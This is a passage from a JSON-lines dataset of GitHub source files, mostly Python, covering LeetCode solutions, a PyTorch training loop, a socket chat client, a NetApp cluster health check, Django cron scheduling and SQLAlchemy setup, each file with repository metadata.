cost[2]\n return min(costVal[0] + costVal[2], costVal[1])\n else:\n costVal[0] = cost[0]\n costVal[1] = cost[1]\n for i in range(2,n):\n costVal[i] = min(costVal[i - 1],costVal[i -2]) + cost[i]\n return min(costVal[-1] , costVal[-2])\n \n \n","repo_name":"ekramkedir2020/interview-prep","sub_path":"0746-min-cost-climbing-stairs/0746-min-cost-climbing-stairs.py","file_name":"0746-min-cost-climbing-stairs.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21000801793","text":"import copy\nimport time\nfrom typing import Dict\n\nimport numpy as np\nimport 
torch\nfrom torch.utils.tensorboard import SummaryWriter\nfrom torch import nn, optim\nfrom torch.utils.data import DataLoader\nfrom tqdm import tqdm\n\nfrom utils.metric import calculate_metrics\nfrom utils.util import save_model, to_var\n\n\ndef train_model(model: nn.Module, data_loaders: Dict[str, DataLoader],\n loss_func: callable, optimizer: optim,\n model_folder: str, tensorboard_folder: str,\n args, **kwargs):\n num_epochs = args.epochs\n phases = ['train', 'val', 'test']\n\n writer = SummaryWriter(tensorboard_folder)\n\n since = time.clock()\n\n # save_dict, best_rmse = {'model_state_dict': copy.deepcopy(model.state_dict()), 'epoch': 0}, 100000\n save_dict, best_pcc = {'model_state_dict': copy.deepcopy(model.state_dict()), 'epoch': 0}, 0\n\n scheduler = optim.lr_scheduler.ReduceLROnPlateau(optimizer, factor=.2, patience=5, threshold=1e-3, min_lr=1e-6)\n\n try:\n for epoch in range(num_epochs):\n running_loss = {phase: 0.0 for phase in phases}\n for phase in phases:\n if phase == 'train':\n model.train()\n else:\n model.eval()\n\n steps, predictions, targets = 0, list(), list()\n tqdm_loader = tqdm(enumerate(data_loaders[phase]))\n for step, (features, truth_data) in tqdm_loader:\n features = to_var(features, args.device)\n truth_data = to_var(truth_data, args.device)\n with torch.set_grad_enabled(phase == 'train'):\n if args.lossinside:\n loss, outputs = model(features, truth_data, args, loss_func=loss_func)\n else:\n outputs = model(features, args)\n loss = loss_func(truth=truth_data, predict=outputs)\n # loss = loss_func(outputs, truth_data)\n\n if phase == 'train':\n if torch.isnan(loss):\n print(\"=============LOSS NAN============\")\n print(features)\n print(truth_data)\n print(outputs)\n else:\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n targets.append(truth_data.cpu().numpy())\n with torch.no_grad():\n predictions.append(outputs.cpu().detach().numpy())\n\n running_loss[phase] += loss * truth_data.size(0)\n steps += truth_data.size(0)\n\n tqdm_loader.set_description(\n f'{phase} epoch: {epoch}, {phase} loss: {running_loss[phase] / steps}')\n\n # For the issue that the CPU memory increases while training. 
DO NOT know why, but it works.\n torch.cuda.empty_cache()\n # 性能\n predictions = np.concatenate(predictions)\n targets = np.concatenate(targets)\n # print(2)\n # print(predictions[:3, :3])\n # print(targets[:3, :3])\n scores = calculate_metrics(predictions.reshape(predictions.shape[0], -1),\n targets.reshape(targets.shape[0], -1), args, plot=epoch % 5 == 0, **kwargs)\n # print(3)\n writer.add_scalars(f'score/{phase}', scores, global_step=epoch)\n with open(model_folder+\"/output.txt\", \"a\") as f:\n f.write(f'{phase} epoch: {epoch}, {phase} loss: {running_loss[phase] / steps}\\n')\n f.write(str(scores))\n f.write('\\n')\n f.write(str(time.time()))\n f.write(\"\\n\\n\")\n print(scores)\n # if phase == 'val' and scores['RMSE'] < best_rmse:\n if phase == 'val' and scores['pearr'] > best_pcc:\n best_pcc = scores['pearr']\n # best_rmse = scores['RMSE']\n save_dict.update(model_state_dict=copy.deepcopy(model.state_dict()),\n epoch=epoch,\n optimizer_state_dict=copy.deepcopy(optimizer.state_dict()))\n\n scheduler.step(running_loss['train'])\n\n writer.add_scalars('Loss', {\n f'{phase} loss': running_loss[phase] / len(data_loaders[phase].dataset) for phase in phases},\n global_step=epoch)\n finally:\n time_elapsed = time.clock() - since\n print(f\"cost {time_elapsed} seconds\")\n\n save_model(f\"{model_folder}/best_model.pkl\", **save_dict)\n save_model(f\"{model_folder}/final_model.pkl\",\n **{'model_state_dict': copy.deepcopy(model.state_dict()),\n 'epoch': num_epochs,\n 'optimizer_state_dict': copy.deepcopy(optimizer.state_dict())})\n","repo_name":"yanshaojie123/time_estimation","sub_path":"train/train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":5193,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"633843286","text":"from socket import AF_INET, socket, SOCK_STREAM\nfrom threading import Thread\n\n\ndef receive():\n \"\"\"Handles receiving of messages.\"\"\"\n while True:\n try:\n msg = client_socket.recv(BUFSIZ).decode(\"utf8\")\n msg_list.append(msg)\n if msg:\n print(chr(27) + \"[2J\")\n [print(mens) for mens in msg_list]\n send()\n except OSError: # Possibly client has left the chat.\n break\n\n\ndef send(event=None): # event is passed by binders.\n \"\"\"Handles sending of messages.\"\"\"\n msg = input(\"escribir mensaje: \")\n # my_msg = \"\" # Clears input field.\n client_socket.send(bytes(msg, \"utf8\"))\n if msg == \"{quit}\":\n client_socket.close()\n quit()\n\n\nmy_msg = \"mensaje\"\nmsg_list = []\n\n# ----Now comes the sockets part----\nHOST = input('Enter host: ')\nPORT = input('Enter port: ')\nif not PORT:\n PORT = 33000\nelse:\n PORT = int(PORT)\n\nBUFSIZ = 1024\nADDR = (HOST, PORT)\n\nclient_socket = socket(AF_INET, SOCK_STREAM)\nclient_socket.connect(ADDR)\n\nreceive_thread = Thread(target=receive)\nreceive_thread.start()\n","repo_name":"alete89/playground","sub_path":"chatConsoleClient.py","file_name":"chatConsoleClient.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74317239849","text":"from igraph import *\n\ndef add_edges_to_table(table, edges_list):\n for e in edges_list:\n if len(table) <= e[0] or len(table) <= e[1]:\n raise Exception('wrong list indexing')\n if table[e[0]][e[1]] is not None:\n table[e[0]][e[1]].append(e[2])\n else:\n table[e[0]][e[1]] = [e[2]]\n\n\ndef edges_list_to_table(edges_list, size):\n table = []\n for i in range(size):\n table.append([])\n for j in 
range(size):\n table[-1].append(None)\n add_edges_to_table(table, edges_list)\n return table\n\n\ndef table_to_edges_list(table):\n edges = []\n for i in range(len(table)):\n for j in range(len(table)):\n if table[i][j] is not None:\n for e in table[i][j]:\n edges.append((i, j, e))\n return edges\n\n\ndef best_visual_style(g, edges_sz, stash_sz, vertexes_sz):\n visual_style = {}\n visual_style[\"vertex_size\"] = 20\n visual_style[\"vertex_color\"] = ['pink' for gender in range(vertexes_sz)]\n visual_style[\"vertex_label\"] = g.vs[\"name\"]\n visual_style[\"vertex_name\"] = g.vs[\"name\"]\n visual_style[\"edge_width\"] = [0.1 * w for w in g.es['weight']]\n visual_style[\"layout\"] = g.layout('large')\n visual_style[\"bbox\"] = (1200, 1200)\n # shortest_length =\n visual_style['arrow_size'] = [0.5 for w in g.es['weight']]\n visual_style['edge_color'] = ['black' if i in range(edges_sz) else 'red' for i in range(edges_sz + stash_sz)]\n return visual_style\n\n\nclass LabGraph:\n nodes = []\n edges = None # edges[i][j] is an array of distances from node i to node j\n edges_list = None # for each edge in graph there is a tuple: (i, j, dist)\n edges_stash = None\n edges_stash_list = None\n\n def get_weighted_shortest_list(self):\n return [[min(e) if e is not None else None for e in arr] for arr in self.edges]\n\n def get_not_weighted_list(self):\n return [[1 if e is not None else None for e in arr] for arr in self.edges]\n\n def cnt_nodes(self):\n return len(self.nodes)\n\n def cnt_edges(self):\n cnt = 0\n for arr in self.edges:\n cnt += sum([len(e) if e is not None else 0 for e in arr])\n return cnt\n\n def max_neighbours_nodes(self):\n neighbours = {}\n for i in range(len(self.nodes)):\n neighbours[self.nodes[i]] = [self.nodes[j] for j in range(len(self.nodes)) if\n self.nodes[i][j] is not None and self.nodes[i][j]]\n return neighbours\n\n def add_to_stash(self, e_stash=None, e_stash_list=None, size=None):\n if e_stash is not None:\n if self.edges_stash is None:\n self.edges_stash = e_stash\n self.edges_stash_list = table_to_edges_list(e_stash)\n else:\n e_stash_list = table_to_edges_list(e_stash)\n add_edges_to_table(self.edges_stash, e_stash_list)\n self.edges_stash_list.extend(e_stash_list)\n else:\n if self.edges_stash is None:\n if size is None:\n size = len(self.edges)\n self.edges_stash = edges_list_to_table(e_stash_list, size)\n self.edges_stash_list = e_stash_list\n else:\n add_edges_to_table(self.edges_stash, e_stash_list)\n self.edges_stash_list.extend(e_stash_list)\n\n def apply_stash(self):\n add_edges_to_table(self.edges, self.edges_stash_list)\n self.edges_list.extend(self.edges_stash_list)\n self.edges_stash = None\n self.edges_stash_list = None\n\n def save_plot(self, folder, filename):\n g = Graph().as_directed()\n g.add_vertices(len(self.nodes))\n weights = []\n for i in range(len(self.edges)):\n for j in range(len(self.edges[i])):\n if self.edges[i][j] is not None:\n for e in self.edges[i][j]:\n g.add_edges([(i, j)])\n weights.append(e)\n if self.edges_stash is not None:\n for i in range(len(self.edges_stash)):\n for j in range(len(self.edges_stash[i])):\n if self.edges_stash[i][j] is not None:\n for e in self.edges_stash[i][j]:\n g.add_edges([(i, j)])\n weights.append(e)\n g.es['weight'] = weights\n g.vs['name'] = [str(e) for e in range(len(self.nodes))]\n # g.es['name'] = [str(e) for e in weights]\n # g.es['label'] = [str(e) for e in weights]\n visial_style = best_visual_style(g, len(self.edges), 0 if self.edges_stash is None else len(self.edges_stash), len(self.nodes))\n 
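# render the assembled igraph figure straight to a PNG file (igraph's plot() needs a cairo backend for this)\n        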
plot(g, folder+filename+'.png', **visial_style)\n\n    def __init__(self, nodes, edges=None, edges_list=None, size=None):\n        self.nodes = nodes\n        if edges is not None:\n            self.edges = []\n            for e in edges:\n                self.edges.append(e.copy())\n            self.edges_list = table_to_edges_list(edges)\n        else:\n            self.edges = edges_list_to_table(edges_list, size)\n            self.edges_list = edges_list.copy()\n\n","repo_name":"FixerLT/labs","sub_path":"discrete math/helpers/my_graph.py","file_name":"my_graph.py","file_ext":"py","file_size_in_byte":5173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}{"seq_id":"25140313675","text":"with open('file_6.txt', encoding='utf-8') as file:\n    result = {}\n    for line in file:  # go through the file line by line\n        s = []  # create a list for each line that we will fill with the numbers from that line\n        for elements in line.split():  # look at every word in the line\n            i = [int(j) for j in elements if j.isdigit()]  # build a list and put the digits into it\n            if i:\n                i = int(''.join((str(_) for _ in i)))  # now glue the digits together into a single number\n                s.append(i)  # and append it to the list of numbers from the line\n        result[line.split()[0]] = sum(s)  # add a key to the result taken from the first element of the line\n        # and store the sum of the line's numbers as its value\n    print(result)\n\n","repo_name":"Sashagrande/Faculty-of-AI","sub_path":"Lesson_5/task_6.py","file_name":"task_6.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}{"seq_id":"30531958581","text":"from topydo.lib.Config import config\n\nNEUTRAL_COLOR = '\\033[0m'\n\nclass Colors(object):\n    def __init__(self):\n        self.priority_colors = config().priority_colors()\n        self.project_color = config().project_color()\n        self.context_color = config().context_color()\n        self.metadata_color = config().metadata_color()\n        self.link_color = config().link_color()\n\n    def _int_to_ansi(self, p_int, p_decorator='normal', p_safe=True):\n        \"\"\"\n        Returns the ansi code for a color based on its xterm color id (0-255)\n        and decoration, where decoration can be one of: normal, bold, faint,\n        italic, or underline. When p_safe is True, the resulting ansi code is\n        constructed in the most compatible way, but supports only the base 16\n        colors.\n        \"\"\"\n        decoration_dict = {\n            'normal': '0',\n            'bold': '1',\n            'faint': '2',\n            'italic': '3',\n            'underline': '4'\n        }\n\n        decoration = decoration_dict[p_decorator]\n\n        try:\n            if p_safe:\n                if 8 > int(p_int) >=0:\n                    return '\\033[{};3{}m'.format(decoration, str(p_int))\n                elif 16 > int(p_int):\n                    p_int = int(p_int) - 8\n                    return '\\033[{};1;3{}m'.format(decoration, str(p_int))\n\n            if 256 > int(p_int) >=0:\n                return '\\033[{};38;5;{}m'.format(decoration, str(p_int))\n            else:\n                return NEUTRAL_COLOR\n        except ValueError:\n            return None\n\n    def _name_to_int(self, p_color_name):\n        \"\"\" Returns the xterm color id for a color name. \"\"\"\n        color_names_dict = {\n            'black': 0,\n            'red': 1,\n            'green': 2,\n            'yellow': 3,\n            'blue': 4,\n            'magenta': 5,\n            'cyan': 6,\n            'gray': 7,\n            'darkgray': 8,\n            'light-red': 9,\n            'light-green': 10,\n            'light-yellow': 11,\n            'light-blue': 12,\n            'light-magenta': 13,\n            'light-cyan': 14,\n            'white': 15,\n        }\n\n        try:\n            return color_names_dict[p_color_name]\n        except KeyError:\n            return 404\n\n    def _name_to_ansi(self, p_color_name, p_decorator):\n        \"\"\" Returns the ansi color code for a color name. 
\"\"\"\n number = self._name_to_int(p_color_name)\n\n return self._int_to_ansi(number, p_decorator)\n\n def _get_ansi(self, p_color, p_decorator):\n \"\"\" Returns ansi color code from color name or xterm color id. \"\"\"\n if p_color == '':\n ansi = ''\n else:\n ansi = self._int_to_ansi(p_color, p_decorator, False)\n\n if not ansi:\n ansi = self._name_to_ansi(p_color, p_decorator)\n\n return ansi\n\n def get_priority_colors(self):\n pri_ansi_colors = dict()\n\n for pri in self.priority_colors:\n color = self._get_ansi(self.priority_colors[pri], 'normal')\n\n if color == '':\n color = NEUTRAL_COLOR\n\n pri_ansi_colors[pri] = color\n\n return pri_ansi_colors\n\n def get_project_color(self):\n return self._get_ansi(self.project_color, 'bold')\n\n def get_context_color(self):\n return self._get_ansi(self.context_color, 'bold')\n\n def get_metadata_color(self):\n return self._get_ansi(self.metadata_color, 'bold')\n\n def get_link_color(self):\n return self._get_ansi(self.link_color, 'underline')\n","repo_name":"LeonCLi/topydo","sub_path":"topydo/lib/Colors.py","file_name":"Colors.py","file_ext":"py","file_size_in_byte":3568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"72070859047","text":"# 给定一个 n 叉树的根节点 root ,返回 其节点值的 前序遍历 。 \n# \n# n 叉树 在输入中按层序遍历进行序列化表示,每组子节点由空值 null 分隔(请参见示例)。 \n# \n# \n# 示例 1: \n# \n# \n# \n# \n# 输入:root = [1,null,3,2,4,null,5,6]\n# 输出:[1,3,5,6,2,4]\n# \n# \n# 示例 2: \n# \n# \n# \n# \n# 输入:root = [1,null,2,3,4,5,null,null,6,7,null,8,null,9,10,null,null,11,null,12,\n# null,13,null,null,14]\n# 输出:[1,2,3,6,7,11,14,4,8,12,5,9,13,10]\n# \n# \n# \n# \n# 提示: \n# \n# \n# 节点总数在范围 [0, 10⁴]内 \n# 0 <= Node.val <= 10⁴ \n# n 叉树的高度小于或等于 1000 \n# \n# \n# \n# \n# 进阶:递归法很简单,你可以使用迭代法完成此题吗? \n# 👍 229 👎 0\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\n\"\"\"\n# Definition for a Node.\nclass Node:\n def __init__(self, val=None, children=None):\n self.val = val\n self.children = children\n\"\"\"\n\n\nclass Solution:\n # def preorder(self, root: 'Node') -> List[int]:\n # \"\"\"\n # 方法1:递归法\n # :param root:\n # :return:\n # \"\"\"\n # res = []\n #\n # def pre(root):\n # if not root:\n # return\n # res.append(root.val)\n # for child in root.children:\n # pre(child)\n #\n # pre(root)\n # return res\n\n def preorder(self, root: 'Node') -> List[int]:\n \"\"\"\n 方法2:迭代法,栈\n :param root:\n :return:\n \"\"\"\n res = []\n if not root:\n return res\n stack = [root]\n while stack:\n node = stack.pop()\n res.append(node.val)\n # for child in node.children[::-1]:\n # stack.append(child)\n # stack.extend(node.children[::-1])\n stack.extend(reversed(node.children))\n return res\n\n# leetcode submit region end(Prohibit modification and deletion)\n","repo_name":"zh805/algorithm","sub_path":"leetcode/python/leetcode/editor/cn/[589]N 叉树的前序遍历.py","file_name":"[589]N 叉树的前序遍历.py","file_ext":"py","file_size_in_byte":1993,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30799887960","text":"import numpy as np\nimport argparse\nimport cv2\n\ndefault_str = 'output/bayesian_predictions/trial_{}.png'\nn = 10\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-p\", \"--plot\", type=str, required=True, help=\"path to save output image\")\n args = parser.parse_args()\n\n images = []\n for i in range(n):\n images.append(cv2.imread(default_str.format(i+1)))\n\n row1 = np.concatenate(images[:n//2], axis=1)\n row2 = np.concatenate(images[n//2:], 
axis=1)\n stitched_image = np.concatenate([row1, row2], axis=0)\n\n cv2.imwrite(args.plot, stitched_image)\n","repo_name":"rabisnath/deeptrouble","sub_path":"LeNet_example/stitch.py","file_name":"stitch.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14333674454","text":"import logging\nfrom monplugin import Check,Status\nfrom netapp_ontap.resources import Cluster, Node, IpInterface\nfrom netapp_ontap.error import NetAppRestError\nfrom ..tools import cli\nfrom ..tools.helper import setup_connection,severity,item_filter\n\n__cmd__ = \"cluster-health\"\n\n\"\"\"\n\"\"\"\ndef run():\n parser = cli.Parser()\n parser.add_optional_arguments(cli.Argument.EXCLUDE,cli.Argument.INCLUDE)\n parser.add_optional_arguments({\n 'name_or_flags': ['--mode'],\n 'options': {\n 'action': 'store',\n 'choices': ['health', 'connect'],\n 'default': 'health',\n 'help': 'check health state or interconnect of a cluster',\n }\n })\n args = parser.get_args()\n # Setup module logging\n logger = logging.getLogger(__name__)\n logger.disabled=True\n if args.verbose:\n for log_name, log_obj in logging.Logger.manager.loggerDict.items():\n log_obj.disabled = False\n logging.getLogger(log_name).setLevel(severity(args.verbose))\n\n setup_connection(args.host, args.api_user, args.api_pass)\n\n check = Check()\n\n # Get data\n try:\n cluster = Cluster()\n cluster.get(fields=\"name,metric,version\")\n logger.debug(f\"Cluster info \\n{cluster.__dict__}\")\n nodes_count = Node.count_collection()\n logger.debug(f\"found {nodes_count} nodes\")\n nodes = list(Node.get_collection(fields=\"name,state,membership,ha,cluster_interfaces\"))\n logger.debug(f\"{nodes}\")\n if args.mode == \"connect\":\n interfaces = []\n for node in nodes:\n # fetch cluster interfaces\n for ipint in node.cluster_interfaces:\n Interface = IpInterface(uuid=ipint.uuid)\n Interface.get()\n interfaces.append(Interface)\n except NetAppRestError as error:\n check.exit(Status.UNKNOWN, \"Error => {}\".format(error))\n #\n # Cluster health check\n #\n if args.mode == \"health\":\n # Cluster global health\n if 'ok' not in cluster.metric.status.lower():\n check.add_message(Status.CRITICAL,\"Cluster global status is {}\".format(cluster.metric.status))\n # Cluster node states\n for node in nodes:\n logger.debug(f\"Node info \\n{node.__dict__}\")\n m = \"{} state {} as {}; giveback: {}; takeover: {}\".format(node.name,node.state,node.membership,node.ha.giveback.state,node.ha.takeover.state)\n if 'up' in node.state:\n check.add_message(Status.OK, m)\n elif 'down' in node.state:\n check.add_message(Status.CRITICAL, m)\n else:\n check.add_message(Status.WARNING, m)\n short = f\"Checked {len(nodes)} Nodes\"\n\n #\n # Cluster connect check\n #\n count = 0\n if args.mode == \"connect\":\n for IpInt in interfaces:\n logger.debug(f\"Interface info {IpInt.name}\\n{IpInt.__dict__}\")\n if (args.exclude or args.include) and item_filter(args,IpInt.name):\n logger.debug(f\"ex-/include interface {IpInt.name}\")\n continue\n count += 1\n if 'down' in IpInt.state:\n check.add_message(Status.CRITICAL, f\"Int {IpInt.name} is {IpInt.state}\")\n elif not IpInt.location.is_home:\n check.add_message(Status.CRITICAL, f\"Int {IpInt.name} is on {IpInt.location.node.name} but should be on {IpInt.location.home_node.name}\")\n else:\n check.add_message(Status.OK, f\"Int {IpInt.name} on {IpInt.location.node.name} port {IpInt.location.port.name} is {IpInt.state}\")\n short = f\"Checked {count} 
Interfaces\"\n\n (code, message) = check.check_messages(separator=\"\\n\")\n check.exit(code=code,message=f\"{short}\\n{message}\")\n\nif __name__ == \"__main__\":\n run()","repo_name":"ConSol-Monitoring/check_ontap","sub_path":"checkontap/ontapcmd/clusterhealth.py","file_name":"clusterhealth.py","file_ext":"py","file_size_in_byte":3828,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"28511650215","text":"import os\nimport numpy as np\nfrom aicsimageio import AICSImage, OmeTifWriter\n\nfrom brightfield2fish.data.preprocess_images import normalize\n\n\ndef test_normalize():\n fpath = os.path.join(\"tmp_tests\", \"foo.ome.tiff\")\n arr = np.random.randint(\n low=0, high=2 ** 16 - 1, size=(1, 2, 3, 4, 5), dtype=np.uint16\n )\n writer = OmeTifWriter(fpath, overwrite_file=True)\n writer.save(arr)\n im = AICSImage(fpath)\n\n for channel in (0, 1):\n _ = normalize(im, channel=channel)\n","repo_name":"AllenCellModeling/brightfield2fish","sub_path":"brightfield2fish/tests/test_preprocess_images.py","file_name":"test_preprocess_images.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"2359230913","text":"import cv2\nimport numpy as np\n\nimg = cv2.imread(\"BMW.jpg\")\nimg2 = cv2.imread(\"BMW X5.jpg\")\ncv2.namedWindow('img', cv2.WINDOW_AUTOSIZE)\ncv2.imshow(\"img\", img)\ncv2.imshow(\"img2\", img2)\ncv2.waitKey(0)\n\n\n# cv2.destroyAllWindows(\"img\")\n# cv2.destroyAllWindows(\"img2\")\n\n\ndef image_shape():\n img = cv2.imread('BNW.jpg')\n print(\"The size of the image is \", img.shape)\n\n\ndef create_black_image():\n black_image = np.zeros((300, 300), np.uint8)\n return black_image\n\n\ndef create_white_image():\n white_image = np.ones((300, 300), np.uint8) * 255\n return white_image\n\n\ndef load_display(image):\n cv2.namedWindow(\"Test\", cv2.WINDOW_AUTOSIZE)\n cv2.imshow(\"Test\", image)\n cv2.waitKey(0)\n # cv2.destroyWindow(\"Test\")\n\n\ndef sliceimage():\n sliceBMW = cv2.imread('BMW X5.jpg')\n load_display(sliceBMW)\n bmw_shape = sliceBMW.shape\n print(bmw_shape)\n half = bmw_shape[1] // 2\n print(half)\n front = sliceBMW[0:543, 0:407]\n load_display(front)\n\n\nif __name__ == \"__main__\":\n # white_image = create_white_image()\n # load_display(white_image)\n\n # black_image = create_black_image()\n # load_display(black_image)\n sliceimage()\n","repo_name":"tadeniyiipadeola/Digit-image-processing-","sub_path":"Basics/Lesson1.py","file_name":"Lesson1.py","file_ext":"py","file_size_in_byte":1164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37860503157","text":"class Solution:\n def countMatches(self, items: List[List[str]], ruleKey: str, ruleValue: str) -> int:\n if(ruleKey=='type'):\n x=0\n elif(ruleKey=='color'):\n x=1\n else:\n x=2\n count=0\n for i in range(len(items)):\n if(items[i][x]==ruleValue):\n count+=1\n return count\n \n \n ","repo_name":"AmitIITP23/LeetCode","sub_path":"count-items-matching-a-rule/count-items-matching-a-rule.py","file_name":"count-items-matching-a-rule.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42883857534","text":"from typing import Callable, Union, Optional, TYPE_CHECKING\n\nfrom apscheduler.triggers.cron import CronTrigger\n\nfrom .apps import JOBS\n\n\ndef cron(crontab, job_id=None):\n \"\"\"\n Wrap a regular function, 
Celery task, or Dramatiq actor in a cron schedule.\n    \"\"\"\n    trigger = CronTrigger.from_crontab(crontab)\n\n    def decorator(f):\n        \"\"\"Create a scheduled trigger for the decorated callable\"\"\"\n\n        # We might be getting called as a wrapper of a regular callable (function, class, etc)\n        # Or we might be getting called as a wrapper of a Dramatiq or Celery task.\n        # We'll start out just adding the callable to the JOBS list, but for example Dramatiq\n        # actors should be invoked as \".send()\", and Celery tasks should be invoked as\n        # \".apply_async()\".\n\n        if hasattr(f, \"send\"):\n            # It's (probably) a Dramatiq Actor\n            func_call = f.send\n            job_name = job_id or f\"{f.fn.__module__}.{f.fn.__name__}\"\n        elif hasattr(f, \"apply_async\"):\n            # It's a Celery task or shared_task\n            func_call = f.apply_async\n            job_name = job_id or f\"{f.name}\"\n        else:\n            # It's something else, probably just a regular callable - call it directly and use repr() as the name\n            func_call = f\n            job_name = job_id or f\"{f.__module__}.{f.__name__}\"\n        JOBS.append((trigger, func_call, job_name))\n        return f\n\n    return decorator\n","repo_name":"LucidDan/django-cadence","sub_path":"django_cadence/scheduling.py","file_name":"scheduling.py","file_ext":"py","file_size_in_byte":1458,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}{"seq_id":"71229920168","text":"price = [12.5,12,30]\nprint(\"The price is: {}\".format(price))\nproduct = {\n    'nume':\"tv\",\n    'price': 1200\n    }\nprint(product.items())\n\nclass Person:\n    def __init__(self,name,age):\n        self.name = name\n        self.age = age\n    def __str__(self):\n        return self.name + ' ' + str(self.age)","repo_name":"lauracarpaciu/Algorithmic_Thinking","sub_path":"Siruri de caractere/Reprezentarea obiectelor ca text.py","file_name":"Reprezentarea obiectelor ca text.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}{"seq_id":"22307410052","text":"from __future__ import annotations\n\nimport logging\nimport os\nfrom contextlib import aclosing, asynccontextmanager\nfrom typing import AsyncContextManager, Optional\n\nimport orjson\nfrom sqlalchemy.engine import Engine\nfrom sqlalchemy.ext.asyncio import AsyncSession, create_async_engine\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import sessionmaker\n\nfrom Shared.functions.readSettingsFile import get_setting\n\nPOSTGRES_USER = os.environ.get(\"POSTGRES_USER\")\nassert POSTGRES_USER\nPOSTGRES_PASSWORD = os.environ.get(\"POSTGRES_PASSWORD\")\nassert POSTGRES_PASSWORD\nPOSTGRES_HOST = os.environ.get(\"POSTGRES_HOST\")\nassert POSTGRES_HOST\nPOSTGRES_PORT = os.environ.get(\"POSTGRES_PORT\")\nassert POSTGRES_PORT\nPOSTGRES_DB = os.environ.get(\"POSTGRES_DB\")\nassert POSTGRES_DB\n\n\nDATABASE_URL = (\n    f\"\"\"postgresql+asyncpg://{POSTGRES_USER}:{POSTGRES_PASSWORD}@{POSTGRES_HOST}:{POSTGRES_PORT}/{POSTGRES_DB}\"\"\"\n)\n_ENGINE = None\n_SESSIONMAKER = None\n_TEST_MODE = False\n\n\ndef update_from_class(self, other_class: Base):\n    if id(self) != id(other_class):\n        for key, value in other_class.__dict__.items():\n            if not key.startswith(\"_\"):\n                setattr(self, key, value)\n\n\nBase = declarative_base()\nBase.update_from_class = update_from_class\n\n\ndef setup_engine(database_url: str = DATABASE_URL) -> Engine:\n    global _ENGINE\n\n    if not _ENGINE:\n        _ENGINE = create_async_engine(\n            database_url,\n            future=True,\n            echo=bool(get_setting(\"ENABLE_DEBUG_MODE\") and not is_test_mode()),\n            
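# pool logging mirrors the debug flag, but stays silent while the test suite runs\n            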
echo_pool=bool(get_setting(\"ENABLE_DEBUG_MODE\") and not is_test_mode()),\n json_deserializer=orjson.loads,\n json_serializer=lambda x: orjson.dumps(x).decode(),\n pool_pre_ping=True,\n pool_size=50,\n max_overflow=125,\n pool_timeout=300,\n )\n\n return _ENGINE\n\n\ndef get_async_sessionmaker() -> sessionmaker:\n global _SESSIONMAKER\n\n # if expire_on_commit is enabled, our own cache would get expired after every session close\n # since we are careful and update the cache when we change an object, that should not be a problem\n if not _SESSIONMAKER:\n _SESSIONMAKER = sessionmaker(bind=setup_engine(), class_=AsyncSession, future=True, expire_on_commit=False)\n return _SESSIONMAKER\n\n\ndef is_test_mode(set_test_mode: Optional[bool] = None) -> bool:\n global _TEST_MODE\n\n if set_test_mode is not None:\n _TEST_MODE = set_test_mode\n\n return _TEST_MODE\n\n\n@asynccontextmanager\nasync def acquire_db_session() -> AsyncContextManager[AsyncSession]:\n \"\"\"Get a database session\"\"\"\n db = get_async_sessionmaker()()\n logger = logging.getLogger(\"db\")\n\n if not db.in_transaction():\n async with db.begin():\n yield db\n else:\n logger.debug(\"Already in transaction\")\n yield db\n if db.in_transaction():\n await db.commit()\n logger.debug(\"Implicit transaction commit\")\n","repo_name":"TheDescend/elevatorbot","sub_path":"Backend/database/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2987,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"36240375344","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 19 15:04:08 2018\n@author: ravila\n\"\"\"\n\nfrom Bio import SeqIO\nimport glob\nimport pandas as pd\nfrom multiprocessing import Pool\nimport numpy as np\nimport sys\n\n\ndef get_reading_frame(seq, n):\n \"\"\"Takes a sequence string and an integer shift\n retruns a list of triplets shifted by the given ammount.\"\"\"\n frame = []\n for f in (seq[i:i+3] for i in range(n, len(seq), 3)):\n if len(f) % 3 == 0:\n frame.append(f)\n return frame\n\n\ndef vectorize(r):\n fasta = SeqIO.read(r, 'fasta')\n sequence = str(fasta.seq)\n # Get reading frames\n rf1 = get_reading_frame(sequence, 0)\n rf2 = get_reading_frame(sequence, 1)\n rf3 = get_reading_frame(sequence, 2)\n # Get the sum of vectors for all the triplets.\n vec = np.zeros(100)\n for l in [rf1, rf2, rf3]:\n for t in l:\n component = np.array(model.loc[model[0] == t])[0][1:]\n vec = np.add(vec, component)\n name = r.split(\"/\")[-1].rstrip(\".txt\")\n return [name] + [i for i in vec]\n\n\nif __name__ == \"__main__\":\n # Import pre-trained model\n 